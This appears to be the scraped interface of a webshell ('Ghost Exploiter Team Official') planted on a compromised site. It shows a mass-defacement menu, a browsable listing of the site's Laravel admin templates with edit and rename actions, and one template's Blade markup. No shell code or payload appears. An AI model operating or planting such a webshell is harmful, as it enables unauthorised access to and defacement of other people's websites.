webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
resources
/
views
/
back
/
item
/
attribute
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
create.blade.php
1.735KB
edt
ren
edit.blade.php
1.813KB
edt
ren
index.blade.php
2.505KB
edt
ren
table.blade.php
0.947KB
edt
ren
@foreach($datas as $data) <tr> <td> {{ $data->name }} </td> <td> <div class="action-list"> <a class="btn btn-secondary btn-sm " href="{{ route('back.attribute.edit',[$item->id,$data->id]) }}"> <i class="fas fa-edit"></i> {{ __('Edit') }} </a> <a class="btn btn-danger btn-sm " data-toggle="modal" data-target="#confirm-delete" href="javascript:;" data-href="{{ route('back.attribute.destroy',[$item->id,$data->id]) }}"> <i class="fas fa-trash-alt"></i> </a> </div> </td> </tr> @endforeach <tr class="text-center"> <td colspan="3"> <a class="btn btn-secondary btn-sm " href="{{ route('back.option.index',$item->id) }}"> <i class="fas fa-tasks"></i> {{ __('Manage Options') }} </a> </td> </tr>